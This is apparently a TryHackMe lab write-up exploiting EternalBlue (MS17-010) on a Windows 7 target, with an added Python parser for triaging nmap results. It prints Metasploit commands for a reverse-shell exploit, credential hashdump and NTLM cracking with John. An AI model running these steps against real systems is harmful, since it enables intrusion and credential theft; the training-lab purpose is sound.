TryHackMe: Blue — EternalBlue (MS17-010) Exploitation

Platform: TryHackMe  |  Difficulty: Easy  |  OS: Windows 7

Overview

The “Blue” room walks through exploiting the infamous EternalBlue vulnerability (MS17-010), the same exploit used in the WannaCry ransomware attack. This room is a foundational exercise in understanding SMB vulnerabilities and why unpatched systems remain dangerous years after public disclosure.

Reconnaissance

nmap -sV -sC --script=vuln 10.10.x.x

The scan reveals SMBv1 is enabled and confirms the system is vulnerable to MS17-010 via the smb-vuln-ms17-010 NSE script.
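For patch triage across more than one host, the same NSE result can be read from nmap's XML report (written with -oX). The parser below is an added example, not part of the original write-up; the sample XML and its addresses are constructed, and the hostscript/script/elem layout is an assumption about the report shape.

```python
"""Triage an nmap XML report for smb-vuln-ms17-010 findings (added example)."""
import xml.etree.ElementTree as ET

# Constructed sample shaped like an nmap -oX report; addresses are placeholders.
SAMPLE_XML = """<nmaprun>
<host><address addr="10.10.0.5" addrtype="ipv4"/>
<hostscript><script id="smb-vuln-ms17-010" output="State: VULNERABLE">
<table key="constructed"><elem key="state">VULNERABLE</elem></table>
</script></hostscript></host>
<host><address addr="10.10.0.6" addrtype="ipv4"/>
<hostscript><script id="smb-os-discovery" output="constructed"/></hostscript></host>
<host><address addr="10.10.0.7" addrtype="ipv4"/></host>
</nmaprun>"""


def ms17_010_status(xml_text):
    """Return {address: status} for every host in the report."""
    results = {}
    for host in ET.fromstring(xml_text).iter("host"):
        addr_el = host.find("address")
        addr = addr_el.get("addr") if addr_el is not None else "unknown"
        scripts = host.findall("./hostscript/script")
        if not scripts:
            # No host scripts ran at all: a coverage gap, not a clean result.
            results[addr] = "NOT CHECKED"
            continue
        status = "NOT REPORTED"  # scripts ran, but no MS17-010 finding was emitted
        for script in scripts:
            if script.get("id") != "smb-vuln-ms17-010":
                continue
            # Check both the structured state element and the text output.
            texts = [e.text or "" for e in script.iter("elem") if e.get("key") == "state"]
            texts.append(script.get("output", ""))
            if any("VULNERABLE" in t and "NOT VULNERABLE" not in t for t in texts):
                status = "VULNERABLE"
        results[addr] = status
    return results


if __name__ == "__main__":
    for address, state in sorted(ms17_010_status(SAMPLE_XML).items()):
        print(f"{address:15} {state}")
```

Hosts marked NOT CHECKED should be rescanned or verified by patch inventory rather than counted as patched.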

Exploitation

use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 10.10.x.x
set LHOST YOUR_TUNNEL_IP
set PAYLOAD windows/x64/shell/reverse_tcp
run

After obtaining a shell, we migrate to a stable process and dump hashes:

run post/multi/manage/shell_to_meterpreter
hashdump

Credential Cracking

Using John with the rockyou wordlist against the extracted NTLM hash:

john --wordlist=rockyou.txt --format=NT hash.txt

Key Takeaways

  • MS17-010 remains exploitable on unpatched, legacy Windows systems
  • Disabling SMBv1 and applying MS17-010 patches are non-negotiable
  • Process migration is critical for stable post-exploitation sessions